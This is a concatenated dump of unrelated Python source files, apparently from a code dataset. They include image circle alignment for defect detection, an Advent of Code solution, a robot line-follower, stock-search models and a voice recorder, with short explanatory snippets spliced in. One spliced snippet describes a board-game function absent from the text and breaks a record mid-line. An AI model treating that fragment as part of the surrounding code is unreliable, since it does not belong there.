cv2.VideoCapture(full_video_path)\n while True:\n times = times + 1\n res, image = camera.read()\n if res:\n if times % frame_frequency == 0:\n # auged_img = Erode_Dilate(image)\n auged_img = cv2.medianBlur(image, 5)\n # 提取aug后图像的圆心\n if auged_or_org:\n circled_img, circles, tag = locate_circle(auged_img)\n else:\n circled_img, circles, tag = locate_circle(image)\n if tag != 0:\n auged_base_name = \"{}_{}.jpg\".format(video[:-4], times)\n save_im_name = os.path.join(out_dir_path, auged_base_name)\n train_im_name = os.path.join(train_frames, auged_base_name)\n # 保存提取到了圆心的图像帧, 且做画圆可视化\n cv2.imwrite(save_im_name, circled_img)\n # 提取到原因的帧, 保存未经处理的原图(后续可做一些别的aug使得训练更easy..)\n 
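`proxima_posicao` rolls a die, wraps past the last board square, and pays a bonus for completing a lap. The wrap logic isolated as a sketch; the board size and bonus mirror the constants used above (21 properties, so `NUM_PROPRIEDADES` is 20):

```python
import random

BOARD_SIZE = 20   # NUM_PROPRIEDADES in the original
LAP_BONUS = 100

def next_position(position, balance):
    """Advance by one die roll; crossing the start square pays the bonus."""
    position += random.randint(1, 6)
    if position > BOARD_SIZE:
        position -= BOARD_SIZE
        balance += LAP_BONUS
    return position, balance

print(next_position(18, 300))  # e.g. (4, 400) when a 6 is rolled
```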
cv2.imwrite(train_im_name, image)\n if auged_base_name not in frame_circle:\n frame_circle[auged_base_name] = []\n frame_circle[auged_base_name].extend(circles.tolist())\n else:\n print('read video fail')\n break \n camera.release()\n\n\n\ndef vis_defect_box(roi_train_img_dir, roi_img_centers, box_labs):\n temp_dict = {'1':4, '2':6, '3': 4}\n ims = [os.path.join(roi_train_img_dir, a) for a in os.listdir(roi_train_img_dir)]\n for im in ims:\n center = roi_img_centers[os.path.basename(im)]\n center = [a-3 for a in center]\n img = cv2.imread(im)\n for box_lab in box_labs:\n box_center = center[0]+box_lab[1], center[1]+box_lab[2]\n # box上下左右放宽些\n p1 = [box_center[0]-box_lab[3]//2-temp_dict[str(box_lab[0])], box_center[1]-box_lab[4]//2-temp_dict[str(box_lab[0])]]\n p2 = [box_center[0]+box_lab[3]//2+temp_dict[str(box_lab[0])], box_center[1]+box_lab[4]//2+temp_dict[str(box_lab[0])]]\n cv2.rectangle(img, p1, p2, (0, 0, 255), 1, 8)\n # cv2.circle(img,(center[0],center[1]),1,(0,255,0),2)\n cv2.imwrite(im, img)\n \n\n\ndef aline_img_roi(img_centers, org_frames, roi_train_img_dir):\n for k, v in img_centers.items():\n image = cv2.imread(os.path.join(org_frames, k))\n p1, p2 = [v[0]-375, v[1]-375], [v[0]+375, v[1]+375]\n p1 = [max(0,a) for a in p1]\n p2 = [min(1280, p2[0]), min(800, p2[1])]\n # 一些物料不完整的可通过以下条件过滤掉\n if (p2[0]-p1[0]) <= 700 or (p2[1]-p1[1])<=700:\n continue\n img_roi = image[p1[1]:p2[1], p1[0]:p2[0]]\n # cv2.imshow('', img_roi)\n # cv2.waitKey(2000)\n cv2.imwrite(os.path.join(roi_train_img_dir, k), img_roi) \n\n\n\ndef circle_alin(video_path, auged_frames, org_frames, roi_train_img_dir):\n # video_path, video_name = '/Users/chenjia/Downloads/Smartmore/2022/比赛-工业表面缺陷检测/mp4s', '001.mp4'\n # auged_frames = ''\n # org_frames = ''\n # roi_train_img_dir = './roi_train_img_dir'\n\n video_paths = [os.path.join(video_path, a) for a in os.listdir(video_path)]\n #1. video拆分成frames, median_blur_aug后做霍夫圆检测. \n for video_path in video_paths:\n video_2_frams(video_path, auged_frames, org_frames, True)\n\n #2. org_frame 做模板匹配定位出小圆心.\n img_centers = get_min_apple_pattern('./pattern/train', org_frames, 'train.jpg')\n\n #3. 根据原心坐标, 对齐矫正物料圆: 其实就是扣出整个物料圆的矩形img, 物料圆的半径是375. 根据扣出的rio_img大小, 可以剔除一些定位不准的物料, 直接丢弃.\n aline_img_roi(img_centers, org_frames, roi_train_img_dir)\n\n # 重新定位roi_img的圆心\n roi_img_centers = get_min_apple_pattern('./pattern/train', roi_train_img_dir, 'train_roi.jpg')\n\n return roi_img_centers\n\n\nif __name__ == \"__main__\":\n #1. video拆分成frames, 并且做aug和霍夫圆检测. 筛选save下后续的train-image\n video_path, video_name = '/Users/chenjia/Downloads/Smartmore/2022/比赛-工业表面缺陷检测/mp4s', '001.mp4'\n auged_frames = './1'\n org_frames = './2'\n # video_2_frams(video_path, video_name, auged_frames, org_frames, True)\n \n #2. 分别用org_frame 和aug_frame做模板匹配定位出小圆心.\n # org\n # img_centers = get_min_apple_pattern('./pattern/train', org_frames)\n # with open(\"./image_centers.json\", \"w\") as f:\n # f.write(json.dumps(img_centers, indent=4))\n # print(len(img_centers))\n '''\n # auged\n img_centers = get_min_apple_pattern('./pattern_org/train', auged_frames)\n print(len(img_centers))\n 模板匹配到的图像数量都是一样额, 个人感觉是用原图好一些? [防止滤波改变图像的一些粗细度]\n '''\n\n #3. 根据原心坐标, 对齐矫正物料圆: 其实就是扣出整个物料圆的矩形img, 物料圆的半径是375\n #另外根据扣出的rio_img大小, 可以剔除一些定位不准的物料. 
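`locate_circle` wraps `cv2.HoughCircles` in a bare `try/except` because the call returns `None` when nothing is detected, and subscripting `None` raises. An explicit `None` check is cleaner; a sketch on a synthetic frame (the ring drawn here only gives the detector something to find, and the thresholds would still need tuning on real video):

```python
import cv2
import numpy as np

gray = np.zeros((800, 1280), dtype=np.uint8)
cv2.circle(gray, (640, 400), 350, 255, 3)  # synthetic ring

circles = cv2.HoughCircles(
    gray, cv2.HOUGH_GRADIENT, dp=1, minDist=100,
    param1=60, param2=30, minRadius=320, maxRadius=400,
)
if circles is None:
    print("no circle found")
else:
    for x, y, r in np.round(circles[0]).astype(int):
        print(x, y, r)
```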
直接丢弃即可.\n roi_train_img_dir = './roi_train_img_dir'\n img_centers = json.load(open(\"./image_centers.json\", \"r\"))\n for k, v in img_centers.items():\n image = cv2.imread(os.path.join(org_frames, k))\n p1, p2 = [v[0]-375, v[1]-375], [v[0]+375, v[1]+375]\n p1 = [max(0,a) for a in p1]\n p2 = [min(1280, p2[0]), min(800, p2[1])]\n # 一些物料不完整的可通过以下条件过滤掉\n if (p2[0]-p1[0]) <= 700 or (p2[1]-p1[1])<=700:\n continue\n img_roi = image[p1[1]:p2[1], p1[0]:p2[0]]\n # cv2.imshow('', img_roi)\n # cv2.waitKey(2000)\n cv2.imwrite(os.path.join(roi_train_img_dir, k), img_roi) \n\n # 重新定位roi_img的圆心\n roi_img_centers = get_min_apple_pattern('./pattern/train', roi_train_img_dir, 'train_roi.jpg')\n # 画个defect可视化看看准否 \n vis_defect_box(roi_train_img_dir, roi_img_centers, [[1,93,59,7,3]])\n\n \n \n\n \n\n\n\n\n\n\n","repo_name":"jiachen0212/det_defect_gongye","sub_path":"circle_alignment.py","file_name":"circle_alignment.py","file_ext":"py","file_size_in_byte":7512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7679703340","text":"from aoc_utils import run_with_timer\n\ndata = [[y for y in x.strip()] for x in open('input.txt').readlines()]\n\n\ndef get_neighbor(lights, row, col):\n\tif 0 <= row < len(lights) and 0 <= col < len(lights[0]):\n\t\treturn lights[row][col]\n\n\ndef get_immediate_neighbors(lights, row, col):\n\treturn [\n\t\tget_neighbor(lights, row - 1, col - 1),\n\t\tget_neighbor(lights, row - 1, col),\n\t\tget_neighbor(lights, row - 1, col + 1),\n\n\t\tget_neighbor(lights, row, col + 1),\n\t\tget_neighbor(lights, row, col - 1),\n\n\t\tget_neighbor(lights, row + 1, col + 1),\n\t\tget_neighbor(lights, row + 1, col),\n\t\tget_neighbor(lights, row + 1, col - 1)\n\t]\n\n\ndef run_x_steps(lights, all_light_pos, step_count):\n\tfor i in range(step_count):\n\t\tlights_to_switch = []\n\t\tfor point in all_light_pos:\n\t\t\tneighbors = get_immediate_neighbors(lights, point[0], point[1])\n\t\t\tif lights[point[0]][point[1]] == '#' and neighbors.count('#') not in (2, 3):\n\t\t\t\tlights_to_switch.append(point)\n\t\t\telif lights[point[0]][point[1]] == '.' and neighbors.count('#') == 3:\n\t\t\t\tlights_to_switch.append(point)\n\t\tfor light in lights_to_switch:\n\t\t\tlights[light[0]][light[1]] = '.' 
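The ROI extraction above clamps a 375-pixel-radius window to the frame and discards crops that come out much smaller than 750x750, a sign the object is partially off-frame. The clamping as a standalone sketch:

```python
import numpy as np

def clamped_crop(img, cx, cy, radius):
    """Crop a (2*radius)-wide window around (cx, cy), clipped to the frame."""
    h, w = img.shape[:2]
    x1, y1 = max(0, cx - radius), max(0, cy - radius)
    x2, y2 = min(w, cx + radius), min(h, cy + radius)
    return img[y1:y2, x1:x2]

frame = np.zeros((800, 1280, 3), dtype=np.uint8)
roi = clamped_crop(frame, 640, 400, 375)
print(roi.shape)  # (750, 750, 3); smaller when the center is near an edge
```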
if lights[light[0]][light[1]] == '#' else '#'\n\treturn sum(x.count('#') for x in lights)\n\n\ndef part_one():\n\tlights = [list(x) for x in data]\n\tall_light_pos = [(row, col) for row in range(len(lights)) for col in range(len(lights[row]))]\n\treturn run_x_steps(lights, all_light_pos, 100)\n\n\ndef part_two():\n\tlights = [list(x) for x in data]\n\tlights[0][0] = '#'\n\tlights[0][-1] = '#'\n\tlights[-1][0] = '#'\n\tlights[-1][-1] = '#'\n\tall_light_pos = [(row, col) for row in range(len(lights)) for col in range(len(lights[row]))]\n\tall_light_pos.remove((0, 0))\n\tall_light_pos.remove((0, len(lights[0])-1))\n\tall_light_pos.remove((len(lights)-1, 0))\n\tall_light_pos.remove((len(lights)-1, len(lights[0])-1))\n\treturn run_x_steps(lights, all_light_pos, 100)\n\n\nif __name__ == '__main__':\n\trun_with_timer(part_one) #\n\trun_with_timer(part_two) #\n","repo_name":"andrewpickett/advent-of-code","sub_path":"2015/python/day18/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1933,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"20258450001","text":"import time\nimport drv8835\nfrom sensor import QTRxRC\nfrom config.service_robot1 import config\n\nDUTY_ST = 300\nDUTY_MIN = 200\t\t# duty lower: 200\nROT1_MS = 5300\nROT1_DURATION = 10\n\nclass Motor(object):\n def __init__(self):\n self._drv = drv8835.DRV8835(config.drv8835_mode,\n config.A_in1, config.A_in2,\n config.B_in1, config.B_in2)\n self._a_duty = 0\n self._b_duty = 0\n\n def start(self):\n self._drv.phen_raw_a_dir(0)\n self._drv.phen_raw_b_dir(0)\n\n def duty(self, a_duty, b_duty):\n self._a_duty = a_duty\n self._b_duty = b_duty\n self._drv.phen_raw_a_duty(self._a_duty)\n self._drv.phen_raw_b_duty(self._b_duty)\n\n def straight(self):\n self.duty(DUTY_ST, DUTY_ST)\n\n def turn_L(self, r_plus):\n self.duty(DUTY_MIN, DUTY_MIN+r_plus)\n\n def turn_R(self, l_plus):\n self.duty(DUTY_MIN+l_plus, DUTY_MIN)\n\n def stop(self):\n self._drv.phen_raw_a_duty(0)\n self._drv.phen_raw_b_duty(0)\n self._drv.phen_raw_a_dir(0)\n self._drv.phen_raw_b_dir(0)\n\n def _rotate(self, a_dir, b_dir, duration_ms):\n self.stop()\n self._drv.phen_raw_a_dir(a_dir)\n self._drv.phen_raw_b_dir(b_dir)\n self.duty(DUTY_MIN, DUTY_MIN)\n time.sleep_ms(duration_ms)\n self.stop()\n\n def rotate_L(self, duration_ms):\n self._rotate(0, 1, duration_ms)\t\t# 1cycle/5.3sec\n\n def rotate_R(self, duration_ms):\n self._rotate(1, 0, duration_ms)\n\nINIT = 0\nGSEARCH = 1\nSHIFT_R = 2\nSHIFT_R2 = 3\nROTATE_R = 4\nONLINE_FROM_R = 5\nONLINE_CONT = 6\nONLINE_FROM_L = 7\nROTATE_L = 8\nSHIFT_L2 = 9\nSHIFT_L = 10\n\nFSM = {\n # 00 01 10 11\n INIT: (GSEARCH, SHIFT_R, SHIFT_L, ONLINE_CONT),\n GSEARCH: (GSEARCH, ROTATE_R, ROTATE_L, ONLINE_CONT),\n #\n SHIFT_R: (SHIFT_R2, SHIFT_R, SHIFT_L, ONLINE_FROM_L),\n SHIFT_R2: (ROTATE_R, SHIFT_R, SHIFT_L, ONLINE_FROM_L),\n ROTATE_R: (GSEARCH, SHIFT_R, SHIFT_L, ONLINE_FROM_L),\n ONLINE_FROM_L: (SHIFT_L, SHIFT_R, SHIFT_L, ONLINE_CONT),\n ONLINE_CONT: (SHIFT_R, SHIFT_R, SHIFT_L, ONLINE_CONT),\n ONLINE_FROM_R: (SHIFT_R, SHIFT_R, SHIFT_L, ONLINE_CONT),\n ROTATE_L: (GSEARCH, SHIFT_R, SHIFT_L, ONLINE_FROM_R),\n SHIFT_L2: (ROTATE_L, SHIFT_R, SHIFT_L, ONLINE_FROM_R),\n SHIFT_L: (SHIFT_L2, SHIFT_R, SHIFT_L, ONLINE_FROM_R),\n}\n\nclass Car(object):\n\n def __init__(self):\n self.act = {\n INIT: None,\n GSEARCH: self.search,\n SHIFT_R: self.shift_r,\n SHIFT_R2: self.shift_r2,\n ROTATE_R: self.rotate_r,\n ONLINE_FROM_L: self.online_from_l,\n ONLINE_CONT: self.online_cont,\n 
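The day-18 solution updates the light grid cell by cell. For a grid this size, a convolution does the neighbor count in one shot; a vectorized sketch of the same rules, with the part-two corner pinning as an option (scipy is an extra dependency the original avoids):

```python
import numpy as np
from scipy.signal import convolve2d

KERNEL = np.array([[1, 1, 1], [1, 0, 1], [1, 1, 1]])

def step(grid, pin_corners=False):
    """One step of the bounded light automaton on a 0/1 integer grid."""
    n = convolve2d(grid, KERNEL, mode="same", boundary="fill")
    nxt = ((grid == 1) & ((n == 2) | (n == 3))) | ((grid == 0) & (n == 3))
    nxt = nxt.astype(int)
    if pin_corners:  # part two: the four corner lights are stuck on
        nxt[0, 0] = nxt[0, -1] = nxt[-1, 0] = nxt[-1, -1] = 1
    return nxt

g = np.random.randint(0, 2, (100, 100))
for _ in range(100):
    g = step(g, pin_corners=True)
print(g.sum())
```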
ONLINE_FROM_R: self.online_from_r,\n ROTATE_L: self.rotate_l,\n SHIFT_L2: self.shift_l2,\n SHIFT_L: self.shift_l,\n }\n\n self._motor = Motor()\n self._qtr = QTRxRC()\n self._qtr.add_sensor(27, 20, 40, 35)\t# mid -> right\n self._qtr.add_sensor(26, 20, 40, 35)\t# left\n\n def sens(self):\n v = 0\n for bit_pos, bval in enumerate(self._qtr.sense_black()):\n v |= (int(bval) << bit_pos)\n # left<<1, mid(right)<<0\n return v\n\n def trace(self):\n sens_str = {0b00:'__', 0b01:'_B', 0b10:'B_', 0b11:'BB'}\n state_str = {INIT:'INIT', GSEARCH:'GSEARCH', SHIFT_R:'SHIFT_R', SHIFT_R2:'SHIFT_R2',\n ROTATE_R:'ROTATE_R', ONLINE_FROM_L:'ONLINE_FROM_L', ONLINE_CONT:'ONLINE_CONT',\n ONLINE_FROM_R:'ONLINE_FROM_R', ROTATE_L:'ROTATE_L', SHIFT_L2:'SHIFT_L2',\n SHIFT_L:'SHIFT_L'}\n self._motor.start()\n cur_state = INIT\n while True:\n sens = self.sens()\n new_state = FSM[cur_state][sens]\n print(state_str[cur_state], sens_str[sens], '->', state_str[new_state])\n action = self.act.get(new_state)\n if action:\n action()\n cur_state = new_state\n time.sleep_ms(20)\n self._motor.stop()\n\n def search(self):\n self._motor.turn_L(100)\n\n def shift_r(self):\n self._motor.turn_R(30)\n\n def shift_r2(self):\n self._motor.turn_R(50)\n\n def rotate_r(self):\n for _ in range(ROT1_MS//ROT1_DURATION):\n self._motor.rotate_R(ROT1_DURATION)\n sens = self.sens()\n if sens == 0b11:\n return\n for _ in range(ROT1_MS//ROT1_DURATION):\n self._motor.rotate_R(ROT1_DURATION)\n sens = self.sens()\n if sens == 0b01 or sens == 0b10:\n return\n\n def online_from_l(self):\n self._motor.turn_L(1)\n\n def online_cont(self):\n self._motor.straight()\n\n def online_from_r(self):\n self._motor.turn_R(1)\n\n def rotate_l(self):\n for _ in range(ROT1_MS//ROT1_DURATION):\n self._motor.rotate_L(ROT1_DURATION)\n sens = self.sens()\n if sens == 0b11:\n return\n for _ in range(ROT1_MS//ROT1_DURATION):\n self._motor.rotate_L(ROT1_DURATION)\n sens = self.sens()\n if sens == 0b01 or sens == 0b10:\n return\n\n def shift_l2(self):\n self._motor.turn_L(50)\n\n def shift_l(self):\n self._motor.turn_L(30)\n\ncar = Car()\nmotor = car._motor\ncar.trace()\n","repo_name":"ccldaout/esp32","sub_path":"upy/test/trace.py","file_name":"trace.py","file_ext":"py","file_size_in_byte":5513,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"2765210692","text":"# -*- coding: utf-8 -*-\n\nfrom mongoengine import *\nfrom collections import OrderedDict\n\nautocmp = OrderedDict({\n # key, search path, end node\n 'AllIdAutoCmp': ('routers/table/AllIdAutoCmp.yaml', {\n 'twse': ([0],),\n 'otc': ([1],)\n })\n})\n\n# register your strategies here\nrouters = OrderedDict({\n # key, search path, init node, middle node, end node\n 'StockProfileRaw': ('routers/table/StockProfileRaw.yaml', {\n 'twse': ([0,1,2], [3], [4]),\n 'otc': ([5,6,7], [8], [9])\n }),\n 'TraderProfileRaw': ('routers/table/TraderProfileRaw.yaml', {\n 'twse': ([0], [], [1]),\n 'otc': ([2], [], [3])\n }),\n 'StockProfileUp0': ('routers/table/StockProfileUp0.yaml', {\n 'twse': ([0,1,2], [3], [4]),\n 'otc': ([5,6,7], [8], [9])\n }),\n 'StockProfileDown0': ('routers/table/StockProfileDown0.yaml', {\n 'twse': ([0,1,2], [3], [4]),\n 'otc': ([5,6,7], [8], [9])\n }),\n 'StockProfileUp1': ('routers/table/StockProfileUp1.yaml', {\n 'twse': ([0], [1,2,3], [4]),\n 'otc': ([5], [6,7,8], [9])\n }),\n 'StockProfileDown1': ('routers/table/StockProfileDown1.yaml', {\n 'twse': ([0], [1,2,3], [4]),\n 'otc': ([5], [6,7,8], [9])\n }),\n 'StockProfileUp2': 
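trace.py drives the robot with a transition table indexed by state and a 2-bit sensor reading, which keeps the control loop to a single dictionary lookup per tick. The pattern boiled down to a sketch, with the states renamed and reduced for brevity:

```python
# state -> next state, indexed by the 2-bit sensor value 0b00..0b11
FSM = {
    "SEARCH": ("SEARCH", "RIGHT", "LEFT", "ONLINE"),
    "ONLINE": ("RIGHT",  "RIGHT", "LEFT", "ONLINE"),
    "LEFT":   ("SEARCH", "RIGHT", "LEFT", "ONLINE"),
    "RIGHT":  ("SEARCH", "RIGHT", "LEFT", "ONLINE"),
}

def run(readings, state="SEARCH"):
    for sensors in readings:
        state = FSM[state][sensors]
        yield state

print(list(run([0b00, 0b01, 0b11, 0b10])))
# ['SEARCH', 'RIGHT', 'ONLINE', 'LEFT']
```

Keeping the table separate from the per-state actions (the `act` dict in the original) makes each easy to audit on its own.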
('routers/table/StockProfileUp2.yaml', {\n 'twse': ([0], [1,2,3], [4]),\n 'otc': ([5], [6,7,8], [9])\n }),\n 'StockProfileDown2': ('routers/table/StockProfileDown2.yaml', {\n 'twse': ([0], [1,2,3], [4]),\n 'otc': ([5], [6,7,8], [9])\n }),\n 'TraderProfileUp0': ('routers/table/TraderProfileUp0.yaml', {\n 'twse': ([0], [], [1]),\n 'otc': ([2], [], [3])\n }),\n 'TraderProfileDown0': ('routers/table/TraderProfileDown0.yaml', {\n 'twse': ([0], [], [1]),\n 'otc': ([2], [], [3])\n }),\n 'TraderGroup0': ('routers/table/TraderGroup0.yaml', {\n 'twse': ([0], [], [1]),\n 'otc': ([2], [], [3])\n }),\n 'TraderGroup1': ('routers/table/TraderGroup1.yaml', {\n 'twse': ([0], [], [1]),\n 'otc': ([2], [], [3])\n }),\n 'TraderGroup2': ('routers/table/TraderGroup2.yaml', {\n 'twse': ([0], [], [1]),\n 'otc': ([2], [], [3])\n }),\n 'TraderGroup3': ('routers/table/TraderGroup3.yaml', {\n 'twse': ([0], [], [1]),\n 'otc': ([2], [], [3])\n }),\n 'TraderGroup4': ('routers/table/TraderGroup4.yaml', {\n 'twse': ([0], [], [1]),\n 'otc': ([2], [], [3])\n }),\n 'StockGroup0': ('routers/table/StockGroup0.yaml', {\n 'twse': ([0], [], [1]),\n 'otc': ([2], [], [3])\n }),\n 'StockGroup1': ('routers/table/StockGroup1.yaml', {\n 'twse': ([0], [], [1]),\n 'otc': ([2], [], [3])\n })\n})\n\nALG_CHOICES = [(i, k) for i, k in enumerate(sorted(routers.keys()))]\n\nOPT_CHOICES = (\n (0, 'twse'),\n (1, 'otc')\n)\n\nclass SearchItem(Document):\n starttime = StringField(required=True, max_length=10, help_text='starttime:2015/01/01')\n endtime = StringField(required=True, max_length=10, help_text='endtime:2015/01/30')\n stockids = StringField(max_length=40, help_text='stockids:2330,2317')\n traderids = StringField(max_length=40, help_text='traderids:1440,1470')\n opt = StringField(required=True, max_length=5, choices=OPT_CHOICES, help_text='opt:twse|otc')\n algorithm = StringField(required=True, max_length=70, choices=ALG_CHOICES, help_text='algorithm')","repo_name":"funningboy/scrapy_giant","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3446,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"11471581207","text":"def sum_mul(n, m):\n if n <= 0 or m <= 0:\n return(\"INVALID\")\n else:\n sum = 0\n for i in range(n, m):\n if i % n == 0:\n sum += i\n return(sum)\n\n\n# Best Practices\ndef sum_mul(n, m):\n if m>0 and n>0:\n return sum(range(n, m, n))\n else:\n return 'INVALID'\n","repo_name":"walkgo/codewars_tasks","sub_path":"8kyu/Sum of Multiples.py","file_name":"Sum of Multiples.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42318879070","text":"from collections import deque\n\nneed = input()\nn = int(input())\n\nfor k in range(1, n + 1):\n d = input()\n queue = deque(need)\n\n for i in range(len(d)):\n if d[i] in queue:\n if d[i] == queue.popleft():\n continue\n else:\n print(\"#%d NO\" % k)\n break\n else:\n if queue:\n print(\"#%d NO\" % k)\n else:\n print(\"#%d YES\" % k)","repo_name":"castle-joooun/algorithm_python","sub_path":"inflearn/algorithm/5/5-7_solv.py","file_name":"5-7_solv.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"71014965866","text":"def Myfun(name,age):\n print(name,age)\n\nMyfun(\"Shivani\",21) \n\ndef func1(*arguments):\n for i in arguments:\n print(i)\n\nfunc1(20,40,60)\nprint() \nfunc1(80,100) \n\ndef 
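The `5-7_solv.py` record above validates each input line against a required sequence by popping a deque as matching items arrive. The core check as a reusable sketch; duplicate handling is simplified relative to the index-based original:

```python
from collections import deque

def in_order(required, stream):
    """True if `stream` contains the items of `required` in order,
    ignoring items that are not in `required` at all."""
    pending = deque(required)
    for item in stream:
        if pending and item == pending[0]:
            pending.popleft()
        elif item in required:
            return False  # a required item arrived out of order
    return not pending

print(in_order("abc", "a1b2c3"))  # True
print(in_order("abc", "acb"))     # False
```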
calculation(a,b):\n addition = a+b\n subtraction = a-b\n return addition,subtraction\n\nprint(\"Return both addition and subtraction in a single return call\")\nfinal = calculation(40,10)\nprint(final)\n\ndef show_employee(name,salary=9000):\n print(name,salary)\n \nshow_employee(\"Ben\",12000) \nshow_employee(\"Jessa\") \n\ndef recursive_fun(numbers):\n if numbers:\n return numbers + recursive_fun(numbers-1)\n else:\n return 0\n \nobj = recursive_fun(10)\nprint(obj) \n\ndef func1(number1,number2):\n list = []\n for i in range(number1,number2,2):\n list.append(i)\n print(list)\n \nfunc1(4,30) \n \ndef display_student(name,age):\n print(name,age)\n \ndisplay_student(\"Emma\",26)\nshow_student = display_student\nshow_student(\"Emma\",26) \n\ndef larger(List):\n max = List[0]\n for i in List:\n if i > max:\n max = i \n print(f\"largest number of the List : {max}\") \n\nList = [4,6,8,24,12,2] \nlarger(List) \n\ndef outer_fun(a,b):\n def inner_fun(a,b):\n return a+b\n addition = inner_fun(a,b)\n return addition+5\n\nfinal = outer_fun(5,10)\nprint(final)","repo_name":"Shivanik2002/Exercise_for_basic_quiz","sub_path":"function_concept.py","file_name":"function_concept.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41388755240","text":"\"\"\"Module used to record the user voice.\"\"\"\nimport wave\nimport struct\nimport math\nimport time\nimport sys\nimport os\nimport dataclasses\nimport pyaudio\n\nfrom app.config.recorder import RECORDER\n\n@dataclasses.dataclass\nclass VoiceRecorderConfig:\n \"\"\"Class used to store the voice recorder configuration.\"\"\"\n rms_threshold: int\n chunk: int\n channels: int\n format: int\n rate: int\n timeout_length: int\n records_directory: str\n\nclass VoiceRecorder:\n \"\"\"Class used to record the user voice.\"\"\"\n @staticmethod\n def rms(frame):\n \"\"\"Returns the root mean square of the frame.\"\"\"\n count = len(frame) / RECORDER['SWIDTH']\n sformat = f'{int(count)}h'\n shorts = struct.unpack(sformat, frame)\n sum_squares = 0.0\n for sample in shorts:\n n_samples = sample * RECORDER['SHORT_NORMALIZE']\n sum_squares += n_samples * n_samples\n rms = math.pow(sum_squares / count, 0.5)\n return rms * 1000\n\n def __init__(self):\n self._config = VoiceRecorderConfig(\n rms_threshold = RECORDER['RMS_THRESHOLD'],\n chunk = RECORDER['CHUNK'],\n channels = RECORDER['CHANNELS'],\n format = RECORDER['FORMAT'],\n rate = RECORDER['RATE'],\n timeout_length = RECORDER['TIMEOUT_LENGTH'],\n records_directory = RECORDER['DIRECTORY'],\n )\n\n self._p = pyaudio.PyAudio()\n self._stream = self._p.open(\n format=self._config.format,\n frames_per_buffer=self._config.chunk,\n channels=self._config.channels,\n rate=self._config.rate,\n input=RECORDER['INPUT'],\n )\n\n def save(self, audio):\n \"\"\"Save the audio into a wav file.\"\"\"\n # Create records directory if not exists\n if not os.path.isdir(self._config.records_directory):\n os.mkdir(self._config.records_directory)\n\n # Get dynamic filename\n now = time.strftime('%Y-%m-%d-%H-%M-%S')\n n_files = len(os.listdir(self._config.records_directory))\n filename = os.path.join(self._config.records_directory, f'{n_files}-{now}.wav')\n\n # Format audio with good parameters\n w_file = wave.open(filename, 'wb')\n w_file.setnchannels(self._config.channels)\n w_file.setsampwidth(self._p.get_sample_size(self._config.format))\n w_file.setframerate(self._config.rate)\n w_file.writeframes(audio)\n w_file.close()\n\n print(f'📁 
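`VoiceRecorder.rms` computes loudness from raw 16-bit PCM bytes via `struct.unpack`. The same computation as a self-contained sketch; `SWIDTH` and `SHORT_NORMALIZE` stand in for the values the `RECORDER` config presumably holds (2 bytes per sample and 1/32768):

```python
import math
import struct

SWIDTH = 2                    # bytes per signed 16-bit sample
SHORT_NORMALIZE = 1.0 / 32768

def rms(frame: bytes) -> float:
    """Root mean square of a PCM block, scaled up for easy thresholding."""
    count = len(frame) // SWIDTH
    samples = struct.unpack(f"{count}h", frame)
    sum_squares = sum((s * SHORT_NORMALIZE) ** 2 for s in samples)
    return math.sqrt(sum_squares / count) * 1000

silence = struct.pack("4h", 0, 0, 0, 0)
loud = struct.pack("4h", 30000, -30000, 30000, -30000)
print(rms(silence), rms(loud))  # 0.0 versus roughly 915
```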
Record saved at {filename}')\n return filename\n\n def record(self):\n \"\"\"Record the user voice when he talk, then save it and return the path.\"\"\"\n print('🎤 Voice detected !')\n\n audio = []\n now = time.time()\n end = time.time() + self._config.timeout_length\n\n while now <= end:\n # Reset timer if the voice is talking\n data = self._stream.read(self._config.chunk)\n if self.rms(data) >= self._config.rms_threshold:\n end = time.time() + self._config.timeout_length\n\n now = time.time()\n audio.append(data)\n\n audio_path = self.save(b''.join(audio))\n return audio_path\n\n def listen(self):\n \"\"\"Loop that listens the user in real time and record the voice when detected.\"\"\"\n print('👂 Ready to listen')\n while True:\n sinput = self._stream.read(self._config.chunk)\n rms_value = self.rms(sinput)\n if rms_value > self._config.rms_threshold:\n sys.stdout.flush()\n audio = self.record()\n return audio\n","repo_name":"TheoBIET/ava.py","sub_path":"app/classes/voice_recorder.py","file_name":"voice_recorder.py","file_ext":"py","file_size_in_byte":3614,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"36259524951","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 27 18:47:06 2018\n\n@author: prime\n\"\"\"\n\ndef isValidWord(word, hand, wordList):\n \"\"\"\n Returns True if word is in the wordList and is entirely\n composed of letters in the hand. Otherwise, returns False.\n\n Does not mutate hand or wordList.\n \n word: string\n hand: dictionary (string -> int)\n wordList: list of lowercase strings\n \"\"\"\n # TO DO ... <-- Remove this comment when you code this function\n letters = [letter for letter in hand.keys() for frequency in range(hand[letter])]\n\n # Check for validity of word in wordList\n if word not in wordList:\n return False\n # Remove letters from word one by one from list\n else:\n for letter in word:\n if letter in letters:\n letters.remove(letter)\n else:\n return False\n return True","repo_name":"pnijhara/python-practice","sub_path":"mit6.00.1x official/week_4_Good_Programming_Practices/ \tProblem_Set_4/problem_3.py","file_name":"problem_3.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22073686371","text":"#--------------------------\n# HTML to MD\n# Author: rey.olivier@gmail.com\n# License: GPL v3\n#--------------------------\nimport re\n\nfrom html.parser import HTMLParser\n\nDO_NOTHING_BEGIN = [\"HTML\", \"HEAD\", \"META\", \"STYLE\", \"BODY\", \"FONT\", \"P\",\n \"COL\", \"TR\", 